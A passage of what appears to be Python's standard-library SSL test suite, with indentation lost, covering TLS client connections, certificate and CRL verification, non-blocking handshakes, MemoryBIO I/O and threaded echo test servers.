self.server_addr = (HOST, server.port)
server.__enter__()
self.addCleanup(server.__exit__, None, None, None)
def test_connect(self):
with test_wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_NONE) as s:
s.connect(self.server_addr)
self.assertEqual({}, s.getpeercert())
self.assertFalse(s.server_side)
# this should succeed because we specify the root cert
with test_wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_REQUIRED,
ca_certs=SIGNING_CA) as s:
s.connect(self.server_addr)
self.assertTrue(s.getpeercert())
self.assertFalse(s.server_side)
def test_connect_fail(self):
# This should fail because we have no verification certs. Connection
# failure crashes ThreadedEchoServer, so run this in an independent
# test method.
s = test_wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_REQUIRED)
self.addCleanup(s.close)
self.assertRaisesRegex(ssl.SSLError, "certificate verify failed",
s.connect, self.server_addr)
def test_connect_ex(self):
# Issue #11326: check connect_ex() implementation
s = test_wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_REQUIRED,
ca_certs=SIGNING_CA)
self.addCleanup(s.close)
self.assertEqual(0, s.connect_ex(self.server_addr))
self.assertTrue(s.getpeercert())
def test_non_blocking_connect_ex(self):
# Issue #11326: non-blocking connect_ex() should allow handshake
# to proceed after the socket gets ready.
s = test_wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_REQUIRED,
ca_certs=SIGNING_CA,
do_handshake_on_connect=False)
self.addCleanup(s.close)
s.setblocking(False)
rc = s.connect_ex(self.server_addr)
# EWOULDBLOCK under Windows, EINPROGRESS elsewhere
self.assertIn(rc, (0, errno.EINPROGRESS, errno.EWOULDBLOCK))
# Wait for connect to finish
select.select([], [s], [], 5.0)
# Non-blocking handshake
while True:
try:
s.do_handshake()
break
except ssl.SSLWantReadError:
select.select([s], [], [], 5.0)
except ssl.SSLWantWriteError:
select.select([], [s], [], 5.0)
# SSL established
self.assertTrue(s.getpeercert())
def test_connect_with_context(self):
# Same as test_connect, but with a separately created context
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ctx.check_hostname = False
ctx.verify_mode = ssl.CERT_NONE
with ctx.wrap_socket(socket.socket(socket.AF_INET)) as s:
s.connect(self.server_addr)
self.assertEqual({}, s.getpeercert())
# Same with a server hostname
with ctx.wrap_socket(socket.socket(socket.AF_INET),
server_hostname="dummy") as s:
s.connect(self.server_addr)
ctx.verify_mode = ssl.CERT_REQUIRED
# This should succeed because we specify the root cert
ctx.load_verify_locations(SIGNING_CA)
with ctx.wrap_socket(socket.socket(socket.AF_INET)) as s:
s.connect(self.server_addr)
cert = s.getpeercert()
self.assertTrue(cert)
def test_connect_with_context_fail(self):
# This should fail because we have no verification certs. Connection
# failure crashes ThreadedEchoServer, so run this in an independent
# test method.
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
s = ctx.wrap_socket(
socket.socket(socket.AF_INET),
server_hostname=SIGNED_CERTFILE_HOSTNAME
)
self.addCleanup(s.close)
self.assertRaisesRegex(ssl.SSLError, "certificate verify failed",
s.connect, self.server_addr)
def test_connect_capath(self):
# Verify server certificates using the `capath` argument
# NOTE: the subject hashing algorithm has been changed between
# OpenSSL 0.9.8n and 1.0.0, as a result the capath directory must
# contain both versions of each certificate (same content, different
# filename) for this test to be portable across OpenSSL releases.
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ctx.load_verify_locations(capath=CAPATH)
with ctx.wrap_socket(socket.socket(socket.AF_INET),
server_hostname=SIGNED_CERTFILE_HOSTNAME) as s:
s.connect(self.server_addr)
cert = s.getpeercert()
self.assertTrue(cert)
# Same with a bytes `capath` argument
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ctx.load_verify_locations(capath=BYTES_CAPATH)
with ctx.wrap_socket(socket.socket(socket.AF_INET),
server_hostname=SIGNED_CERTFILE_HOSTNAME) as s:
s.connect(self.server_addr)
cert = s.getpeercert()
self.assertTrue(cert)
def test_connect_cadata(self):
with open(SIGNING_CA) as f:
pem = f.read()
der = ssl.PEM_cert_to_DER_cert(pem)
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ctx.load_verify_locations(cadata=pem)
with ctx.wrap_socket(socket.socket(socket.AF_INET),
server_hostname=SIGNED_CERTFILE_HOSTNAME) as s:
s.connect(self.server_addr)
cert = s.getpeercert()
self.assertTrue(cert)
# same with DER
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ctx.load_verify_locations(cadata=der)
with ctx.wrap_socket(socket.socket(socket.AF_INET),
server_hostname=SIGNED_CERTFILE_HOSTNAME) as s:
s.connect(self.server_addr)
cert = s.getpeercert()
self.assertTrue(cert)
@unittest.skipIf(os.name == "nt", "Can't use a socket as a file under Windows")
def test_makefile_close(self):
# Issue #5238: creating a file-like object with makefile() shouldn't
# delay closing the underlying "real socket" (here tested with its
# file descriptor, hence skipping the test under Windows).
ss = test_wrap_socket(socket.socket(socket.AF_INET))
ss.connect(self.server_addr)
fd = ss.fileno()
f = ss.makefile()
f.close()
# The fd is still open
os.read(fd, 0)
# Closing the SSL socket should close the fd too
ss.close()
gc.collect()
with self.assertRaises(OSError) as e:
os.read(fd, 0)
self.assertEqual(e.exception.errno, errno.EBADF)
def test_non_blocking_handshake(self):
s = socket.socket(socket.AF_INET)
s.connect(self.server_addr)
s.setblocking(False)
s = test_wrap_socket(s,
cert_reqs=ssl.CERT_NONE,
do_handshake_on_connect=False)
self.addCleanup(s.close)
count = 0
while True:
try:
count += 1
s.do_handshake()
break
except ssl.SSLWantReadError:
select.select([s], [], [])
except ssl.SSLWantWriteError:
select.select([], [s], [])
if support.verbose:
sys.stdout.write("\nNeeded %d calls to do_handshake() to establish session.\n" % count)
def test_get_server_certificate(self):
_test_get_server_certificate(self, *self.server_addr, cert=SIGNING_CA)
def test_get_server_certificate_sni(self):
host, port = self.server_addr
server_names = []
# We store servername_cb arguments to make sure they match the host
def servername_cb(ssl_sock, server_name, initial_context):
server_names.append(server_name)
self.server_context.set_servername_callback(servername_cb)
pem = ssl.get_server_certificate((host, port))
if not pem:
self.fail("No server certificate on %s:%s!" % (host, port))
pem = ssl.get_server_certificate((host, port), ca_certs=SIGNING_CA)
if not pem:
self.fail("No server certificate on %s:%s!" % (host, port))
if support.verbose:
sys.stdout.write("\nVerified certificate for %s:%s is\n%s\n" % (host, port, pem))
self.assertEqual(server_names, [host, host])
def test_get_server_certificate_fail(self):
# Connection failure crashes ThreadedEchoServer, so run this in an
# independent test method
_test_get_server_certificate_fail(self, *self.server_addr)
def test_get_server_certificate_timeout(self):
def servername_cb(ssl_sock, server_name, initial_context):
time.sleep(0.2)
self.server_context.set_servername_callback(servername_cb)
with self.assertRaises(socket.timeout):
ssl.get_server_certificate(self.server_addr, ca_certs=SIGNING_CA,
timeout=0.1)
def test_ciphers(self):
with test_wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_NONE, ciphers="ALL") as s:
s.connect(self.server_addr)
with test_wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_NONE, ciphers="DEFAULT") as s:
s.connect(self.server_addr)
# Error checking can happen at instantiation or when connecting
with self.assertRaisesRegex(ssl.SSLError, "No cipher can be selected"):
with socket.socket(socket.AF_INET) as sock:
s = test_wrap_socket(sock,
cert_reqs=ssl.CERT_NONE, ciphers="^$:,;?*'dorothyx")
s.connect(self.server_addr)
def test_get_ca_certs_capath(self):
# capath certs are loaded on request
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ctx.load_verify_locations(capath=CAPATH)
self.assertEqual(ctx.get_ca_certs(), [])
with ctx.wrap_socket(socket.socket(socket.AF_INET),
server_hostname='localhost') as s:
s.connect(self.server_addr)
cert = s.getpeercert()
self.assertTrue(cert)
self.assertEqual(len(ctx.get_ca_certs()), 1)
def test_context_setget(self):
# Check that the context of a connected socket can be replaced.
ctx1 = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ctx1.load_verify_locations(capath=CAPATH)
ctx2 = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ctx2.load_verify_locations(capath=CAPATH)
s = socket.socket(socket.AF_INET)
with ctx1.wrap_socket(s, server_hostname='localhost') as ss:
ss.connect(self.server_addr)
self.assertIs(ss.context, ctx1)
self.assertIs(ss._sslobj.context, ctx1)
ss.context = ctx2
self.assertIs(ss.context, ctx2)
self.assertIs(ss._sslobj.context, ctx2)
def ssl_io_loop(self, sock, incoming, outgoing, func, *args, **kwargs):
# A simple IO loop. Call func(*args) depending on the error we get
# (WANT_READ or WANT_WRITE) move data between the socket and the BIOs.
timeout = kwargs.get('timeout', support.SHORT_TIMEOUT)
deadline = time.monotonic() + timeout
count = 0
while True:
if time.monotonic() > deadline:
self.fail("timeout")
errno = None
count += 1
try:
ret = func(*args)
except ssl.SSLError as e:
if e.errno not in (ssl.SSL_ERROR_WANT_READ,
ssl.SSL_ERROR_WANT_WRITE):
raise
errno = e.errno
# Get any data from the outgoing BIO irrespective of any error, and
# send it to the socket.
buf = outgoing.read()
sock.sendall(buf)
# If there's no error, we're done. For WANT_READ, we need to get
# data from the socket and put it in the incoming BIO.
if errno is None:
break
elif errno == ssl.SSL_ERROR_WANT_READ:
buf = sock.recv(32768)
if buf:
incoming.write(buf)
else:
incoming.write_eof()
if support.verbose:
sys.stdout.write("Needed %d calls to complete %s().\n"
% (count, func.__name__))
return ret
def test_bio_handshake(self):
sock = socket.socket(socket.AF_INET)
self.addCleanup(sock.close)
sock.connect(self.server_addr)
incoming = ssl.MemoryBIO()
outgoing = ssl.MemoryBIO()
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
self.assertTrue(ctx.check_hostname)
self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
ctx.load_verify_locations(SIGNING_CA)
sslobj = ctx.wrap_bio(incoming, outgoing, False,
SIGNED_CERTFILE_HOSTNAME)
self.assertIs(sslobj._sslobj.owner, sslobj)
self.assertIsNone(sslobj.cipher())
self.assertIsNone(sslobj.version())
self.assertIsNotNone(sslobj.shared_ciphers())
self.assertRaises(ValueError, sslobj.getpeercert)
if 'tls-unique' in ssl.CHANNEL_BINDING_TYPES:
self.assertIsNone(sslobj.get_channel_binding('tls-unique'))
self.ssl_io_loop(sock, incoming, outgoing, sslobj.do_handshake)
self.assertTrue(sslobj.cipher())
self.assertIsNotNone(sslobj.shared_ciphers())
self.assertIsNotNone(sslobj.version())
self.assertTrue(sslobj.getpeercert())
if 'tls-unique' in ssl.CHANNEL_BINDING_TYPES:
self.assertTrue(sslobj.get_channel_binding('tls-unique'))
try:
self.ssl_io_loop(sock, incoming, outgoing, sslobj.unwrap)
except ssl.SSLSyscallError:
# If the server shuts down the TCP connection without sending a
# secure shutdown message, this is reported as SSL_ERROR_SYSCALL
pass
self.assertRaises(ssl.SSLError, sslobj.write, b'foo')
def test_bio_read_write_data(self):
sock = socket.socket(socket.AF_INET)
self.addCleanup(sock.close)
sock.connect(self.server_addr)
incoming = ssl.MemoryBIO()
outgoing = ssl.MemoryBIO()
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ctx.check_hostname = False
ctx.verify_mode = ssl.CERT_NONE
sslobj = ctx.wrap_bio(incoming, outgoing, False)
self.ssl_io_loop(sock, incoming, outgoing, sslobj.do_handshake)
req = b'FOO\n'
self.ssl_io_loop(sock, incoming, outgoing, sslobj.write, req)
buf = self.ssl_io_loop(sock, incoming, outgoing, sslobj.read, 1024)
self.assertEqual(buf, b'foo\n')
self.ssl_io_loop(sock, incoming, outgoing, sslobj.unwrap)
class NetworkedTests(unittest.TestCase):
def test_timeout_connect_ex(self):
# Issue #12065: on a timeout, connect_ex() should return the original
# errno (mimicking the behaviour of non-SSL sockets).
with socket_helper.transient_internet(REMOTE_HOST):
s = test_wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_REQUIRED,
do_handshake_on_connect=False)
self.addCleanup(s.close)
s.settimeout(0.0000001)
rc = s.connect_ex((REMOTE_HOST, 443))
if rc == 0:
self.skipTest("REMOTE_HOST responded too quickly")
elif rc == errno.ENETUNREACH:
self.skipTest("Network unreachable.")
self.assertIn(rc, (errno.EAGAIN, errno.EWOULDBLOCK))
@unittest.skipUnless(socket_helper.IPV6_ENABLED, 'Needs IPv6')
def test_get_server_certificate_ipv6(self):
with socket_helper.transient_internet('ipv6.google.com'):
_test_get_server_certificate(self, 'ipv6.google.com', 443)
_test_get_server_certificate_fail(self, 'ipv6.google.com', 443)
def _test_get_server_certificate(test, host, port, cert=None):
pem = ssl.get_server_certificate((host, port))
if not pem:
test.fail("No server certificate on %s:%s!" % (host, port))
pem = ssl.get_server_certificate((host, port), ca_certs=cert)
if not pem:
test.fail("No server certificate on %s:%s!" % (host, port))
if support.verbose:
sys.stdout.write("\nVerified certificate for %s:%s is\n%s\n" % (host, port ,pem))
def _test_get_server_certificate_fail(test, host, port):
try:
pem = ssl.get_server_certificate((host, port), ca_certs=CERTFILE)
except ssl.SSLError as x:
#should fail
if support.verbose:
sys.stdout.write("%s\n" % x)
else:
test.fail("Got server certificate %s for %s:%s!" % (pem, host, port))
from test.ssl_servers import make_https_server
class ThreadedEchoServer(threading.Thread):
class ConnectionHandler(threading.Thread):
"""A mildly complicated class, because we want it to work both
with and without the SSL wrapper around the socket connection, so
that we can test the STARTTLS functionality."""
def __init__(self, server, connsock, addr):
self.server = server
self.running = False
self.sock = connsock
self.addr = addr
self.sock.setblocking(True)
self.sslconn = None
threading.Thread.__init__(self)
self.daemon = True
def wrap_conn(self):
try:
self.sslconn = self.server.context.wrap_socket(
self.sock, server_side=True)
self.server.selected_alpn_protocols.append(self.sslconn.selected_alpn_protocol())
except (ConnectionResetError, BrokenPipeError, ConnectionAbortedError) as e:
# We treat ConnectionResetError as though it were an
# SSLError - OpenSSL on Ubuntu abruptly closes the
# connection when asked to use an unsupported protocol.
#
# BrokenPipeError is raised in TLS 1.3 mode, when OpenSSL
# tries to send session tickets after handshake.
# https://github.com/openssl/openssl/issues/6342
#
# ConnectionAbortedError is raised in TLS 1.3 mode, when OpenSSL
# tries to send session tickets after handshake when using WinSock.
self.server.conn_errors.append(str(e))
if self.server.chatty:
handle_error("\n server: bad connection attempt from " + repr(self.addr) + ":\n")
self.running = False
self.close()
return False
except (ssl.SSLError, OSError) as e:
# OSError may occur with wrong protocols, e.g. both
# sides use PROTOCOL_TLS_SERVER.
#
# XXX Various errors can have happened here, for example
# a mismatching protocol version, an invalid certificate,
# or a low-level bug. This should be made more discriminating.
#
# bpo-31323: Store the exception as string to prevent
# a reference leak: server -> conn_errors -> exception
# -> traceback -> self (ConnectionHandler) -> server
self.server.conn_errors.append(str(e))
if self.server.chatty:
handle_error("\n server: bad connection attempt from " + repr(self.addr) + ":\n")
self.running = False
self.server.stop()
self.close()
return False
else:
self.server.shared_ciphers.append(self.sslconn.shared_ciphers())
if self.server.context.verify_mode == ssl.CERT_REQUIRED:
cert = self.sslconn.getpeercert()
if support.verbose and self.server.chatty:
sys.stdout.write(" client cert is " + pprint.pformat(cert) + "\n")
cert_binary = self.sslconn.getpeercert(True)
if support.verbose and self.server.chatty:
if cert_binary is None:
sys.stdout.write(" client did not provide a cert\n")
else:
sys.stdout.write(f" cert binary is {len(cert_binary)}b\n")
cipher = self.sslconn.cipher()
if support.verbose and self.server.chatty:
sys.stdout.write(" server: connection cipher is now " + str(cipher) + "\n")
return True
def read(self):
if self.sslconn:
return self.sslconn.read()
else:
return self.sock.recv(1024)
def write(self, bytes):
if self.sslconn:
return self.sslconn.write(bytes)
else:
return self.sock.send(bytes)
def close(self):
if self.sslconn:
self.sslconn.close()
else:
self.sock.close()
def run(self):
self.running = True
if not self.server.starttls_server:
if not self.wrap_conn():
return
while self.running:
try:
msg = self.read()
stripped = msg.strip()
if not stripped:
# eof, so quit this handler
self.running = False
try:
self.sock = self.sslconn.unwrap()
except OSError:
# Many tests shut the TCP connection down
# without an SSL shutdown. This causes
# unwrap() to raise OSError with errno=0!
pass
else:
self.sslconn = None
self.close()
elif stripped == b'over':
if support.verbose and self.server.connectionchatty:
sys.stdout.write(" server: client closed connection\n")
self.close()
return
elif (self.server.starttls_server and
stripped == b'STARTTLS'):
if support.verbose and self.server.connectionchatty:
sys.stdout.write(" server: read STARTTLS from client, sending OK...\n")
self.write(b"OK\n")
if not self.wrap_conn():
return
elif (self.server.starttls_server and self.sslconn
and stripped == b'ENDTLS'):
if support.verbose and self.server.connectionchatty:
sys.stdout.write(" server: read ENDTLS from client, sending OK...\n")
self.write(b"OK\n")
self.sock = self.sslconn.unwrap()
self.sslconn = None
if support.verbose and self.server.connectionchatty:
sys.stdout.write(" server: connection is now unencrypted...\n")
elif stripped == b'CB tls-unique':
if support.verbose and self.server.connectionchatty:
sys.stdout.write(" server: read CB tls-unique from client, sending our CB data...\n")
data = self.sslconn.get_channel_binding("tls-unique")
self.write(repr(data).encode("us-ascii") + b"\n")
elif stripped == b'PHA':
if support.verbose and self.server.connectionchatty:
sys.stdout.write(" server: initiating post handshake auth\n")
try:
self.sslconn.verify_client_post_handshake()
except ssl.SSLError as e:
self.write(repr(e).encode("us-ascii") + b"\n")
else:
self.write(b"OK\n")
elif stripped == b'HASCERT':
if self.sslconn.getpeercert() is not None:
self.write(b'TRUE\n')
else:
self.write(b'FALSE\n')
elif stripped == b'GETCERT':
cert = self.sslconn.getpeercert()
self.write(repr(cert).encode("us-ascii") + b"\n")
elif stripped == b'VERIFIEDCHAIN':
certs = self.sslconn._sslobj.get_verified_chain()
self.write(len(certs).to_bytes(1, "big") + b"\n")
elif stripped == b'UNVERIFIEDCHAIN':
certs = self.sslconn._sslobj.get_unverified_chain()
self.write(len(certs).to_bytes(1, "big") + b"\n")
else:
if (support.verbose and
self.server.connectionchatty):
ctype = (self.sslconn and "encrypted") or "unencrypted"
sys.stdout.write(" server: read %r (%s), sending back %r (%s)...\n"
% (msg, ctype, msg.lower(), ctype))
self.write(msg.lower())
except OSError as e:
# handles SSLError and socket errors
if self.server.chatty and support.verbose:
if isinstance(e, ConnectionError):
# OpenSSL 1.1.1 sometimes raises
# ConnectionResetError when connection is not
# shut down gracefully.
print(
f" Connection reset by peer: {self.addr}"
)
else:
handle_error("Test server failure:\n")
try:
self.write(b"ERROR\n")
except OSError:
pass
self.close()
self.running = False
# normally, we'd just stop here, but for the test
# harness, we want to stop the server
self.server.stop()
def __init__(self, certificate=None, ssl_version=None,
certreqs=None, cacerts=None,
chatty=True, connectionchatty=False, starttls_server=False,
alpn_protocols=None,
ciphers=None, context=None):
if context:
self.context = context
else:
self.context = ssl.SSLContext(ssl_version
if ssl_version is not None
else ssl.PROTOCOL_TLS_SERVER)
self.context.verify_mode = (certreqs if certreqs is not None
else ssl.CERT_NONE)
if cacerts:
self.context.load_verify_locations(cacerts)
if certificate:
self.context.load_cert_chain(certificate)
if alpn_protocols:
self.context.set_alpn_protocols(alpn_protocols)
if ciphers:
self.context.set_ciphers(ciphers)
self.chatty = chatty
self.connectionchatty = connectionchatty
self.starttls_server = starttls_server
self.sock = socket.socket()
self.port = socket_helper.bind_port(self.sock)
self.flag = None
self.active = False
self.selected_alpn_protocols = []
self.shared_ciphers = []
self.conn_errors = []
threading.Thread.__init__(self)
self.daemon = True
def __enter__(self):
self.start(threading.Event())
self.flag.wait()
return self
def __exit__(self, *args):
self.stop()
self.join()
def start(self, flag=None):
self.flag = flag
threading.Thread.start(self)
def run(self):
self.sock.settimeout(1.0)
self.sock.listen(5)
self.active = True
if self.flag:
# signal an event
self.flag.set()
while self.active:
try:
newconn, connaddr = self.sock.accept()
if support.verbose and self.chatty:
sys.stdout.write(' server: new connection from '
+ repr(connaddr) + '\n')
handler = self.ConnectionHandler(self, newconn, connaddr)
handler.start()
handler.join()
except TimeoutError as e:
if support.verbose:
sys.stdout.write(f' connection timeout {e!r}\n')
except KeyboardInterrupt:
self.stop()
except BaseException as e:
if support.verbose and self.chatty:
sys.stdout.write(
' connection handling failed: ' + repr(e) + '\n')
self.close()
def close(self):
if self.sock is not None:
self.sock.close()
self.sock = None
def stop(self):
self.active = False
class AsyncoreEchoServer(threading.Thread):
# this one's based on asyncore.dispatcher
class EchoServer (asyncore.dispatcher):
class ConnectionHandler(asyncore.dispatcher_with_send):
def __init__(self, conn, certfile):
self.socket = test_wrap_socket(conn, server_side=True,
certfile=certfile,
do_handshake_on_connect=False)
asyncore.dispatcher_with_send.__init__(self, self.socket)
self._ssl_accepting = True
self._do_ssl_handshake()
def readable(self):
if isinstance(self.socket, ssl.SSLSocket):
while self.socket.pending() > 0:
self.handle_read_event()
return True
def _do_ssl_handshake(self):
try:
self.socket.do_handshake()
except (ssl.SSLWantReadError, ssl.SSLWantWriteError):
return
except ssl.SSLEOFError:
return self.handle_close()
except ssl.SSLError:
raise
except OSError as err:
if err.args[0] == errno.ECONNABORTED:
return self.handle_close()
else:
self._ssl_accepting = False
def handle_read(self):
if self._ssl_accepting:
self._do_ssl_handshake()
else:
data = self.recv(1024)
if support.verbose:
sys.stdout.write(" server: read %s from client\n" % repr(data))
if not data:
self.close()
else:
self.send(data.lower())
def handle_close(self):
self.close()
if support.verbose:
sys.stdout.write(" server: closed connection %s\n" % self.socket)
def handle_error(self):
raise
def __init__(self, certfile):
self.certfile = certfile
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.port = socket_helper.bind_port(sock, '')
asyncore.dispatcher.__init__(self, sock)
self.listen(5)
def handle_accepted(self, sock_obj, addr):
if support.verbose:
sys.stdout.write(" server: new connection from %s:%s\n" %addr)
self.ConnectionHandler(sock_obj, self.certfile)
def handle_error(self):
raise
def __init__(self, certfile):
self.flag = None
self.active = False
self.server = self.EchoServer(certfile)
self.port = self.server.port
threading.Thread.__init__(self)
self.daemon = True
def __str__(self):
return "<%s %s>" % (self.__class__.__name__, self.server)
def __enter__(self):
self.start(threading.Event())
self.flag.wait()
return self
def __exit__(self, *args):
if support.verbose:
sys.stdout.write(" cleanup: stopping server.\n")
self.stop()
if support.verbose:
sys.stdout.write(" cleanup: joining server thread.\n")
self.join()
if support.verbose:
sys.stdout.write(" cleanup: successfully joined.\n")
# make sure that ConnectionHandler is removed from socket_map
asyncore.close_all(ignore_all=True)
def start (self, flag=None):
self.flag = flag
threading.Thread.start(self)
def run(self):
self.active = True
if self.flag:
self.flag.set()
while self.active:
try:
asyncore.loop(1)
except:
pass
def stop(self):
self.active = False
self.server.close()
def server_params_test(client_context, server_context, indata=b"FOO\n",
chatty=True, connectionchatty=False, sni_name=None,
session=None):
"""
Launch a server, connect a client to it and try various reads
and writes.
"""
stats = {}
server = ThreadedEchoServer(context=server_context,
chatty=chatty,
connectionchatty=False)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=sni_name, session=session) as s:
s.connect((HOST, server.port))
for arg in [indata, bytearray(indata), memoryview(indata)]:
if connectionchatty:
if support.verbose:
sys.stdout.write(
" client: sending %r...\n" % indata)
s.write(arg)
outdata = s.read()
if connectionchatty:
if support.verbose:
sys.stdout.write(" client: read %r\n" % outdata)
if outdata != indata.lower():
raise AssertionError(
"bad data <<%r>> (%d) received; expected <<%r>> (%d)\n"
% (outdata[:20], len(outdata),
indata[:20].lower(), len(indata)))
s.write(b"over\n")
if connectionchatty:
if support.verbose:
sys.stdout.write(" client: closing connection.\n")
stats.update({
'compression': s.compression(),
'cipher': s.cipher(),
'peercert': s.getpeercert(),
'client_alpn_protocol': s.selected_alpn_protocol(),
'version': s.version(),
'session_reused': s.session_reused,
'session': s.session,
})
s.close()
stats['server_alpn_protocols'] = server.selected_alpn_protocols
stats['server_shared_ciphers'] = server.shared_ciphers
return stats
def try_protocol_combo(server_protocol, client_protocol, expect_success,
certsreqs=None, server_options=0, client_options=0):
"""
Try to SSL-connect using *client_protocol* to *server_protocol*.
If *expect_success* is true, assert that the connection succeeds,
if it's false, assert that the connection fails.
Also, if *expect_success* is a string, assert that it is the protocol
version actually used by the connection.
"""
if certsreqs is None:
certsreqs = ssl.CERT_NONE
certtype = {
ssl.CERT_NONE: "CERT_NONE",
ssl.CERT_OPTIONAL: "CERT_OPTIONAL",
ssl.CERT_REQUIRED: "CERT_REQUIRED",
}[certsreqs]
if support.verbose:
formatstr = (expect_success and " %s->%s %s\n") or " {%s->%s} %s\n"
sys.stdout.write(formatstr %
(ssl.get_protocol_name(client_protocol),
ssl.get_protocol_name(server_protocol),
certtype))
with warnings_helper.check_warnings():
# ignore Deprecation warnings
client_context = ssl.SSLContext(client_protocol)
client_context.options |= client_options
server_context = ssl.SSLContext(server_protocol)
server_context.options |= server_options
min_version = PROTOCOL_TO_TLS_VERSION.get(client_protocol, None)
if (min_version is not None
# SSLContext.minimum_version is only available on recent OpenSSL
# (setter added in OpenSSL 1.1.0, getter added in OpenSSL 1.1.1)
and hasattr(server_context, 'minimum_version')
and server_protocol == ssl.PROTOCOL_TLS
and server_context.minimum_version > min_version
):
# If OpenSSL configuration is strict and requires more recent TLS
# version, we have to change the minimum to test old TLS versions.
with warnings_helper.check_warnings():
server_context.minimum_version = min_version
# NOTE: we must enable "ALL" ciphers on the client, otherwise an
# SSLv23 client will send an SSLv3 hello (rather than SSLv2)
# starting from OpenSSL 1.0.0 (see issue #8322).
if client_context.protocol == ssl.PROTOCOL_TLS:
client_context.set_ciphers("ALL")
seclevel_workaround(server_context, client_context)
for ctx in (client_context, server_context):
ctx.verify_mode = certsreqs
ctx.load_cert_chain(SIGNED_CERTFILE)
ctx.load_verify_locations(SIGNING_CA)
try:
stats = server_params_test(client_context, server_context,
chatty=False, connectionchatty=False)
# Protocol mismatch can result in either an SSLError, or a
# "Connection reset by peer" error.
except ssl.SSLError:
if expect_success:
raise
except OSError as e:
if expect_success or e.errno != errno.ECONNRESET:
raise
else:
if not expect_success:
raise AssertionError(
"Client protocol %s succeeded with server protocol %s!"
% (ssl.get_protocol_name(client_protocol),
ssl.get_protocol_name(server_protocol)))
elif (expect_success is not True
and expect_success != stats['version']):
raise AssertionError("version mismatch: expected %r, got %r"
% (expect_success, stats['version']))
class ThreadedTests(unittest.TestCase):
def test_echo(self):
"""Basic test of an SSL client connecting to a server"""
if support.verbose:
sys.stdout.write("\n")
client_context, server_context, hostname = testing_context()
with self.subTest(client=ssl.PROTOCOL_TLS_CLIENT, server=ssl.PROTOCOL_TLS_SERVER):
server_params_test(client_context=client_context,
server_context=server_context,
chatty=True, connectionchatty=True,
sni_name=hostname)
client_context.check_hostname = False
with self.subTest(client=ssl.PROTOCOL_TLS_SERVER, server=ssl.PROTOCOL_TLS_CLIENT):
with self.assertRaises(ssl.SSLError) as e:
server_params_test(client_context=server_context,
server_context=client_context,
chatty=True, connectionchatty=True,
sni_name=hostname)
self.assertIn(
'Cannot create a client socket with a PROTOCOL_TLS_SERVER context',
str(e.exception)
)
with self.subTest(client=ssl.PROTOCOL_TLS_SERVER, server=ssl.PROTOCOL_TLS_SERVER):
with self.assertRaises(ssl.SSLError) as e:
server_params_test(client_context=server_context,
server_context=server_context,
chatty=True, connectionchatty=True)
self.assertIn(
'Cannot create a client socket with a PROTOCOL_TLS_SERVER context',
str(e.exception)
)
with self.subTest(client=ssl.PROTOCOL_TLS_CLIENT, server=ssl.PROTOCOL_TLS_CLIENT):
with self.assertRaises(ssl.SSLError) as e:
server_params_test(client_context=server_context,
server_context=client_context,
chatty=True, connectionchatty=True)
self.assertIn(
'Cannot create a client socket with a PROTOCOL_TLS_SERVER context',
str(e.exception))
def test_getpeercert(self):
if support.verbose:
sys.stdout.write("\n")
client_context, server_context, hostname = testing_context()
server = ThreadedEchoServer(context=server_context, chatty=False)
with server:
with client_context.wrap_socket(socket.socket(),
do_handshake_on_connect=False,
server_hostname=hostname) as s:
s.connect((HOST, server.port))
# getpeercert() raise ValueError while the handshake isn't
# done.
with self.assertRaises(ValueError):
s.getpeercert()
s.do_handshake()
cert = s.getpeercert()
self.assertTrue(cert, "Can't get peer certificate.")
cipher = s.cipher()
if support.verbose:
sys.stdout.write(pprint.pformat(cert) + '\n')
sys.stdout.write("Connection cipher is " + str(cipher) + '.\n')
if 'subject' not in cert:
self.fail("No subject field in certificate: %s." %
pprint.pformat(cert))
if ((('organizationName', 'Python Software Foundation'),)
not in cert['subject']):
self.fail(
"Missing or invalid 'organizationName' field in certificate subject; "
"should be 'Python Software Foundation'.")
self.assertIn('notBefore', cert)
self.assertIn('notAfter', cert)
before = ssl.cert_time_to_seconds(cert['notBefore'])
after = ssl.cert_time_to_seconds(cert['notAfter'])
self.assertLess(before, after)
def test_crl_check(self):
if support.verbose:
sys.stdout.write("\n")
client_context, server_context, hostname = testing_context()
tf = getattr(ssl, "VERIFY_X509_TRUSTED_FIRST", 0)
self.assertEqual(client_context.verify_flags, ssl.VERIFY_DEFAULT | tf)
# VERIFY_DEFAULT should pass
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
cert = s.getpeercert()
self.assertTrue(cert, "Can't get peer certificate.")
# VERIFY_CRL_CHECK_LEAF without a loaded CRL file fails
client_context.verify_flags |= ssl.VERIFY_CRL_CHECK_LEAF
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
with self.assertRaisesRegex(ssl.SSLError,
"certificate verify failed"):
s.connect((HOST, server.port))
# now load a CRL file. The CRL file is signed by the CA.
client_context.load_verify_locations(CRLFILE)
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
